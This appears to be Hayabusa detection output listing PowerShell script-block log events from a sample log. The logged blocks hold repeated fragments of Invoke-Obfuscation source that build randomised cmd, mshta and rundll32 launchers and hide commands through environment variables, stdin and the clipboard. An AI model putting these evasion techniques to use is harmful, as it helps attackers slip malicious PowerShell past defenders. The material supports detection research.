$ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToMshta , $MshtaCmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } default {Write-Error ""An invalid `$LaunchType value ($LaunchType) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } # Output process tree output format of applied launcher to help the Blue Team find indicators and the Red Team to better avoid detection. If($ArgsDefenderWillSee.Count -gt 0) { Write-Host ""`n`nProcess Argument Tree of ObfuscatedCommand with current launcher:"" $Counter = -1 ForEach($Line in $ArgsDefenderWillSee) { If($Line.Count -gt 1) { $Part1 = $Line[0] $Part2 = $Line[1] } Else { $Part1 = $Line $Part2 = '' } $LineSpacing = '' If($Counter -ge 0) { $LineSpacing = ' '*$Counter Write-Host ""$LineSpacing|`n$LineSpacing\--> "" -NoNewline } # Print each command and argument, handling if the argument length is too long to display coherently. Write-Host $Part1 -NoNewLine -ForegroundColor Yellow # Maximum size for cmd.exe and clipboard. $CmdMaxLength = 8190 If($Part2.Length -gt $CmdMaxLength) { # Output Part2, handling if the size of Part2 exceeds $CmdMaxLength characters. $RedactedPrintLength = $CmdMaxLength/5 # Handle printing redaction message in middle of screen. 
#OCD $CmdLineWidth = (Get-Host).UI.RawUI.BufferSize.Width $RedactionMessage = """" $CenteredRedactionMessageStartIndex = (($CmdLineWidth-$RedactionMessage.Length)/2) - ($Part1.Length+$LineSpacing.Length) $CurrentRedactionMessageStartIndex = ($RedactedPrintLength % $CmdLineWidth) If($CurrentRedactionMessageStartIndex -gt $CenteredRedactionMessageStartIndex) { $RedactedPrintLength = $RedactedPrintLength-($CurrentRedactionMessageStartIndex-$CenteredRedactionMessageStartIndex) } Else { $RedactedPrintLength = $RedactedPrintLength+($CenteredRedactionMessageStartIndex-$CurrentRedactionMessageStartIndex) } Write-Host $Part2.SubString(0,$RedactedPrintLength) -NoNewLine -ForegroundColor Cyan Write-Host $RedactionMessage -NoNewLine -ForegroundColor Magenta Write-Host $Part2.SubString($Part2.Length-$RedactedPrintLength) -ForegroundColor Cyan } Else { Write-Host $Part2 -ForegroundColor Cyan } $Counter++ } Start-Sleep 1 } # Make sure final command doesn't exceed cmd.exe's character limit. # Only apply this check to LaunchType values less than 13 since all the other launchers are not command line launchers. $CmdMaxLength = 8190 If(($CmdLineOutput.Length -gt $CmdMaxLength) -AND ($LaunchType -lt 13)) { Write-Host """" Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" Start-Sleep 1 } Return $CmdLineOutput } Function Out-RandomInvokeRandomEnvironmentVariableSyntax { <# .SYNOPSIS HELPER FUNCTION :: Generates randomized syntax for invoking a process-level environment variable. 
Invoke-Obfuscation Function: Out-RandomInvokeRandomEnvironmentVariableSyntax Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (found in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-RandomInvokeRandomEnvironmentVariableSyntax generates random invoke syntax and random process-level environment variable retrieval syntax for invoking command contents that are stored in a user-input process-level environment variable. This function is primarily used as a helper function for Out-PowerShellLauncher. .PARAMETER EnvVarName User input string or array of strings containing environment variable names to randomly select and apply invoke syntax. .EXAMPLE C:\PS> Out-RandomInvokeRandomEnvironmentVariableSyntax 'varname' .(\""In\"" +\""v\"" + \""o\""+ \""Ke-ExpRes\""+ \""sION\"" ) (^&( \""GC\"" +\""i\"" ) eNV:vaRNAMe ).\""V`ALue\"" .NOTES This cmdlet is a helper function for Out-PowerShellLauncher's more sophisticated $LaunchType options wher",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.296 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Maximum 3) + $_ + ' '*(Get-Random -Minimum 0 -Maximum 3) + '""' + ' '*(Get-Random -Minimum 1 -Maximum 4)}) -Join '' # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. 
$PSCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $ExecutionFlagsRunDllSyntax + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$InvokeOption`"""" $RundllCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $Shell32Dll + (Get-Random -Input @(',',' ', ((Get-Random -Input @(',',',',',',' ',' ',' ') -Count (Get-Random -Input @(4..6)))-Join''))) + 'ShellExec_RunDLL' + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$PathToPowerShell`"""" + $PSCmdSyntax $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + $PathToRunDll + $RundllCmdSyntax # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToRunDll , $RundllCmdSyntax) $ArgsDefenderWillSee += , @(""`""$PathToPowerShell`"""", $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 12 { ############# ## MSHTA++ ## ############# # Undo one layer of escaping from beginning of function since we're only dealing with one level of cmd.exe escaping in this block. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. 
$CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. # Keep calling Out-RandomInvokeRandomEnvironmentVariableSyntax until we get the shorter syntax (not using $ExecutionContext syntax) since mshta.exe has a short argument size limitation. $InvokeOption = (Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName).Replace('\""',""'"").Replace('`','') While($InvokeOption.Length -gt 200) { $InvokeOption = (Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName).Replace('\""',""'"").Replace('`','') } # Generate randomize case syntax for all available command arguments for mshta.exe. 
$CreateObject = ([Char[]]'VBScript:CreateObject' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $WScriptShell = ([Char[]]'WScript.Shell' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $Run = ([Char[]]'.Run' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $TrueString = ([Char[]]'True' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $WindowClose = ([Char[]]'Window.Close' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Randomly decide whether to concatenate WScript.Shell or just encapsulate it with double quotes. If((Get-Random -Input @(0..1)) -eq 0) { $WScriptShell = Out-ConcatenatedString $WScriptShell '""' } Else { $WScriptShell = '""' + $WScriptShell + '""' } # Randomly decide whether or not to concatenate PowerShell command. If((Get-Random -Input @(0..1)) -eq 0) { # Concatenate $InvokeOption and unescape double quotes from the result. $SubStringArray += (Out-ConcatenatedString $InvokeOption.Trim('""') '""').Replace('`""','""') # Remove concatenation introduced in above step if it concatenates immediately after a cmd.exe escape character. If($InvokeOption.Contains('^""+""')) { $InvokeOption = $InvokeOption.Replace('^""+""','^') } } # Random choose between using the numeral 1 and using a random subtraction syntax that is equivalent to 1. If((Get-Random -Input @(0..1)) -eq 0) { $One = 1 } Else { # Randomly select between two digit and three digit subtraction syntax. 
$RandomNumber = Get-Random -Minimum 3 -Maximum 25 If(Get-Random -Input @(0..1)) { $One = [String]$RandomNumber + '-' + ($RandomNumber-1) } Else { $SecondRandomNumber = Get-Random -Minimum 1 -Maximum $RandomNumber $One = [String]$RandomNumber + '-' + $SecondRandomNumber + '-' + ($RandomNumber-$SecondRandomNumber-1) } # Randomly decide to encapsulate with parentheses (not necessary). If((Get-Random -Input @(0..1)) -eq 0) { $One = '(' + $One + ')' } } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + ' '*(Get-Random -Minimum 0 -Maximum 3) + $InvokeOption + '"",' + $One + ',' + $TrueString + "")($WindowClose)"" $MshtaCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $CreateObject + ""($WScriptShell)"" + $Run + '(""' + $PathToPowerShell + $PSCmdSyntax + '""' $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + $PathToMshta + $MshtaCmdSyntax # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToMshta , $MshtaCmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } default {Write-Error ""An invalid `$LaunchType value ($LaunchType) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } # Output process tree output format of applied launcher to help the Blue Team find indicators and the Red Team to better avoid detection. 
If($ArgsDefenderWillSee.Count -gt 0) { Write-Host ""`n`nProcess Argument Tree of ObfuscatedCommand with current launcher:"" $Counter = -1 ForEach($Line in $ArgsDefenderWillSee) { If($Line.Count -gt 1) { $Part1 = $Line[0] $Part2 = $Line[1] } Else { $Part1 = $Line $Part2 = '' } $LineSpacing = '' If($Counter -ge 0) { $LineSpacing = ' '*$Counter Write-Host ""$LineSpacing|`n$LineSpacing\--> "" -NoNewline } # Print each command and argument, handling if the argument length is too long to display coherently. Write-Host $Part1 -NoNewLine -ForegroundColor Yellow # Maximum size for cmd.exe and clipboard. $CmdMaxLength = 8190 If($Part2.Length -gt $CmdMaxLength) { # Output Part2, handling if the size of Part2 exceeds $CmdMaxLength characters. $RedactedPrintLength = $CmdMaxLength/5 # Handle printing redaction message in middle of screen. #OCD $CmdLineWidth = (Get-Host).UI.RawUI.BufferSize.Width $RedactionMessage = """" $CenteredRedactionMessageStartIndex = (($CmdLineWidth-$RedactionMessage.Length)/2) - ($Part1.Length+$LineSpacing.Length) $CurrentRedactionMessageStartIndex = ($RedactedPrintLength % $CmdLineWidth) If($CurrentRedactionMessageStartIndex -gt $CenteredRedactionMessageStartIndex) { $RedactedPrintLength = $RedactedPrintLength-($CurrentRedactionMessageStartIndex-$CenteredRedactionMessageStartIndex) } Else { $RedactedPrintLength = $RedactedPrintLength+($CenteredRedactionMessageStartIndex-$CurrentRedactionMessageStartIndex) } Write-Host $Part2.SubString(0,$RedactedPrintLength) -NoNewLine -ForegroundColor Cyan Write-Host $RedactionMessage -NoNewLine -ForegroundColor Magenta Write-Host $Part2.SubString($Part2.Length-$RedactedPrintLength) -ForegroundColor Cyan } Else { Write-Host $Part2 -ForegroundColor Cyan } $Counter++ } Start-Sleep 1 } # Make sure final command doesn't exceed cmd.exe's character limit. # Only apply this check to LaunchType values less than 13 since all the other launchers are not command line launchers. 
$CmdMaxLength = 8190 If(($CmdLineOutput.Length -gt $CmdMaxLength) -AND ($LaunchType -lt 13)) { Write-Host """" Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" Start-Sleep 1 } Return $CmdLineOutput } Function Out-RandomInvokeRandomEnvironmentVariableSyntax { <# .SYNOPSIS HELPER FUNCTION :: Generates randomized syntax for invoking a process-level environment variable. Invoke-Obfuscation Function: Out-RandomInvokeRandomEnvironmentVariableSyntax Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (found in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-RandomInvokeRandomEnvironmentVariableSyntax generates random invoke syntax and random process-level environment variable retrieval syntax for invoking command contents that are stored in a user-input process-level environment variable. This function is primarily used as a helper function for Out-PowerShellLauncher. .PARAMETER EnvVarName User input string or array of strings containing environment variable names to randomly select and apply invoke syntax. .EXAMPLE C:\PS> Out-RandomInvokeRandomEnvironmentVariableSyntax 'varname' .(\""In\"" +\""v\"" + \""o\""+ \""Ke-ExpRes\""+ \""sION\"" ) (^&( \""GC\"" +\""i\"" ) eNV:vaRNAMe ).\""V`ALue\"" .NOTES This cmdlet is a helper function for Out-PowerShellLauncher's more sophisticated $LaunchType options wher",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.296 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"e the PowerShell command is set in process-level environment variables for command line obfuscation benefits. 
This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String[]] $EnvVarName ) # Retrieve random variable from variable name array passed in as argument. $EnvVarName = Get-Random -Input $EnvVarName # Generate numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. $ExecContextVariables = @() $ExecContextVariables += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + ""'variable:"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""').Value"" $ExecContextVariables += '(' + (Get-Random -Input @('Get-Variable','GV','Variable')) + ' ' + ""'"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""'"" + (Get-Random -Input (').Value',(' ' + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ')'))) # Select random option from above. $ExecContextVariable = Get-Random -Input $ExecContextVariables # Generate numerous ways to invoke command stored in environment variable. $GetRandomVariableSyntax = @() $GetRandomVariableSyntax += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + 'env:' + $EnvVarName + ').Value' $GetRandomVariableSyntax += ('(' + '[Environment]::GetEnvironmentVariable(' + ""'$EnvVarName'"" + ',' + ""'Process'"" + ')' + ')') # Select random option from above. $GetRandomVariableSyntax = Get-Random -Input $GetRandomVariableSyntax # Generate random invoke operation syntax. # 50% split between using $ExecutionContext invocation syntax versus IEX/Invoke-Expression/variable-obfuscated-'iex' syntax generated by Out-EncapsulatedInvokeExpression. 
$ExpressionToInvoke = $GetRandomVariableSyntax If(Get-Random -Input @(0..1)) { # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. $InvokeOption = Out-EncapsulatedInvokeExpression $ExpressionToInvoke } Else { $InvokeOption = (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ExpressionToInvoke + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' } # Random case of $InvokeOption. $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Run random invoke operation through the appropriate token obfuscators if $PowerShellStdIn is not simply a value of - from above random options. If($InvokeOption -ne '-') { # Run through all available token obfuscation functions in random order. $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) 'RandomWhitespace' 1 } # For obfuscated commands generated for $InvokeOption syntax, single-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($InvokeOption.Contains(""$Char"")) { $InvokeOption = $InvokeOption.Replace(""$Char"",""^$Char"") } } # Escape double-quote with backslash for powershell.exe. If($InvokeOption.Contains('""')) { $InvokeOption = $InvokeOption.Replace('""','\""') } Return $InvokeOption } Function Out-RandomPowerShellStdInInvokeSyntax { <# .SYNOPSIS HELPER FUNCTION :: Generates randomized PowerShell syntax for invoking a command passed to powershell.exe via standard input. 
Invoke-Obfuscation Function: Out-RandomPowerShellStdInInvokeSyntax Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (found in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-RandomPowerShellStdInInvokeSyntax generates random PowerShell syntax for invoking a command passed to powershell.exe via standard input. This technique is included to show the Blue Team that powershell.exe's command line arguments may not contain any contents of the command itself, but these could be stored in the parent process if passed to powershell.exe via standard input. .EXAMPLE C:\PS> Out-RandomPowerShellStdInInvokeSyntax ( ^& ('v'+( 'aR'+ 'Iabl' ) + 'E' ) ('exE'+'CUTiOnco' +'n'+ 'TeX' + 't' ) -Val).\""INvOKec`oMm`A`ND\"".\""invO`K`es`CRiPt\""(${I`N`puT} ) .NOTES This cmdlet is a helper function for Out-PowerShellLauncher's more sophisticated $LaunchType options where the PowerShell command is passed to powershell.exe via standard input for command line obfuscation benefits. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Build out random PowerShell stdin syntax like: # | powershell - <-- default to this if $NoExit flag is defined because this will cause an error for the other options # | powershell IEX $Input # | powershell $ExecutionContext.InvokeCommand.InvokeScript($Input) # Also including numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. 
$ExecContextVariables = @() $ExecContextVariables += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + ""'variable:"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""').Value"" $ExecContextVariables += '(' + (Get-Random -Input @('Get-Variable','GV','Variable')) + ' ' + ""'"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""'"" + (Get-Random -Input (').Value',(' ' + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ')'))) # Select random option from above. $ExecContextVariable = (Get-Random -Input $ExecContextVariables) $RandomInputVariable = (Get-Random -Input @('$Input','${Input}')) # Generate random invoke operation syntax. # 50% split between using $ExecutionContext invocation syntax versus IEX/Invoke-Expression/variable-obfuscated-'iex' syntax generated by Out-EncapsulatedInvokeExpression. $ExpressionToInvoke = $RandomInputVariable If(Get-Random -Input @(0..1)) { # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. $InvokeOption = Out-EncapsulatedInvokeExpression $ExpressionToInvoke } Else { $InvokeOption = (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ExpressionToInvoke + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' } # Random case of $InvokeOption. $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # If $NoExit flag is defined in calling function then default to - stdin syntax. It will cause errors for other syntax options. If($NoExit) { $InvokeOption = '-' } # Set $PowerShellStdIn to value of $InvokeOption. $PowerShellStdIn = $InvokeOption # Random case of $PowerShellStdIn. 
$PowerShellStdIn = ([Char[]]$PowerShellStdIn.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Run random PowerShell Stdin operation through the appropriate token obfuscators. If($PowerShellStdIn -ne '-') { # Run through all available token obfuscation functions in random order. $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) 'RandomWhitespace' 1 } # For obfuscated commands generated for $PowerShellStdIn syntax, single-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($PowerShellStdIn.Contains(""$Char"")) { $PowerShellStdIn = $PowerShellStdIn.Replace(""$Char"",""^$Char"") } } # Escape double-quote with backslash for powershell.exe. If($PowerShellStdIn.Contains('""')) { $PowerShellStdIn = $PowerShellStdIn.Replace('""','\""') } Return $PowerShellStdIn } Function Out-RandomClipboardInvokeSyntax { <# .SYNOPSIS HELPER FUNCTION :: Generates randomized PowerShell syntax for invoking a command stored in the clipboard. Invoke-Obfuscation Function: Out-RandomClipboardInvokeSyntax Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (found in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-RandomClipboardInvokeSyntax generates random PowerShell syntax for invoking a command stored in the clipboard. This technique is included to show the Blue Team that powershell.exe's command line arguments may not contain any contents of the command itself, but these could be stored in the parent/grandparent process if passed to powershell.exe via clipboard. 
.EXAMPLE C:\PS> Out-RandomClipboardInvokeSyntax . ( \""{0}{1}\"" -f( \""{1}{0}\""-f 'p','Add-Ty' ),'e' ) -AssemblyName ( \""{1}{0}{3}{2}\""-f ( \""{2}{0}{3}{1}\""-f'Wi','dows.Fo','em.','n'),(\""{1}{0}\""-f 'yst','S'),'s','rm' ) ; (.( \""{0}\"" -f'GV' ) (\""{2}{3}{1}{0}{4}\"" -f 'E','onCoNT','EXEC','UTi','XT')).\""Va`LuE\"".\""inVOK`Ec`OMmANd\"".\""inVOKe`SC`RIpT\""(( [sYsTEM.WInDOwS.foRMS.ClIPbOard]::( \""{1}{0}\""-f (\""{2}{1}{0}\"" -f'XT','tTE','e'),'g').Invoke( ) ) ) ;[System.Windows.Forms.Clipboard]::( \""{1}{0}\""-f'ar','Cle' ).Invoke( ) .NOTES This cmdlet is a helper function for Out-PowerShellLauncher's more sophisticated $LaunchType options where the PowerShell command is passed to powershell.exe via clipboard for command line obfuscation benefits. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Set variables necessary for loading appropriate class/type to be able to interact with the clipboard. $ReflectionAssembly = Get-Random -Input @('System.Reflection.Assembly','Reflection.Assembly') $WindowsClipboard = Get-Random -Input @('Windows.Clipboard','System.Windows.Clipboard') $WindowsFormsClipboard = Get-Random -Input @('System.Windows.Forms.Clipboard','Windows.Forms.Clipboard') # Randomly select flag argument substring for Add-Type -AssemblyCore. $FullArgument = ""-AssemblyName"" # Take into account the shorted flag of -AN as well. $AssemblyNameFlags = @() $AssemblyNameFlags += '-AN' For($Index=2; $Index -le $FullArgument.Length; $Index++) { $AssemblyNameFlags += $FullArgument.SubString(0,$Index) } $AssemblyNameFlag = Get-Random -Input $AssemblyNameFlags # Characters we will use to generate random variable name. # For simplicity do NOT include single- or double-quotes in this array. 
$CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(3..6)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Generate random variable name. $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Generate paired random syntax options for: A) loading necessary class/assembly, B) retrieving contents from clipboard, and C) clearing/overwritting clipboard contents. $RandomClipSyntaxValue = Get-Random -Input @(1..3) Switch($RandomClipSyntaxValue) { 1 {",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.296 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"e the PowerShell command is set in process-level environment variables for command line obfuscation benefits. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String[]] $EnvVarName ) # Retrieve random variable from variable name array passed in as argument. $EnvVarName = Get-Random -Input $EnvVarName # Generate numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. 
$ExecContextVariables = @() $ExecContextVariables += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + ""'variable:"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""').Value"" $ExecContextVariables += '(' + (Get-Random -Input @('Get-Variable','GV','Variable')) + ' ' + ""'"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""'"" + (Get-Random -Input (').Value',(' ' + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ')'))) # Select random option from above. $ExecContextVariable = Get-Random -Input $ExecContextVariables # Generate numerous ways to invoke command stored in environment variable. $GetRandomVariableSyntax = @() $GetRandomVariableSyntax += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + 'env:' + $EnvVarName + ').Value' $GetRandomVariableSyntax += ('(' + '[Environment]::GetEnvironmentVariable(' + ""'$EnvVarName'"" + ',' + ""'Process'"" + ')' + ')') # Select random option from above. $GetRandomVariableSyntax = Get-Random -Input $GetRandomVariableSyntax # Generate random invoke operation syntax. # 50% split between using $ExecutionContext invocation syntax versus IEX/Invoke-Expression/variable-obfuscated-'iex' syntax generated by Out-EncapsulatedInvokeExpression. $ExpressionToInvoke = $GetRandomVariableSyntax If(Get-Random -Input @(0..1)) { # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. $InvokeOption = Out-EncapsulatedInvokeExpression $ExpressionToInvoke } Else { $InvokeOption = (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ExpressionToInvoke + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' } # Random case of $InvokeOption. 
$InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Run random invoke operation through the appropriate token obfuscators if $PowerShellStdIn is not simply a value of - from above random options. If($InvokeOption -ne '-') { # Run through all available token obfuscation functions in random order. $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) 'RandomWhitespace' 1 } # For obfuscated commands generated for $InvokeOption syntax, single-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($InvokeOption.Contains(""$Char"")) { $InvokeOption = $InvokeOption.Replace(""$Char"",""^$Char"") } } # Escape double-quote with backslash for powershell.exe. If($InvokeOption.Contains('""')) { $InvokeOption = $InvokeOption.Replace('""','\""') } Return $InvokeOption } Function Out-RandomPowerShellStdInInvokeSyntax { <# .SYNOPSIS HELPER FUNCTION :: Generates randomized PowerShell syntax for invoking a command passed to powershell.exe via standard input. Invoke-Obfuscation Function: Out-RandomPowerShellStdInInvokeSyntax Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (found in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: 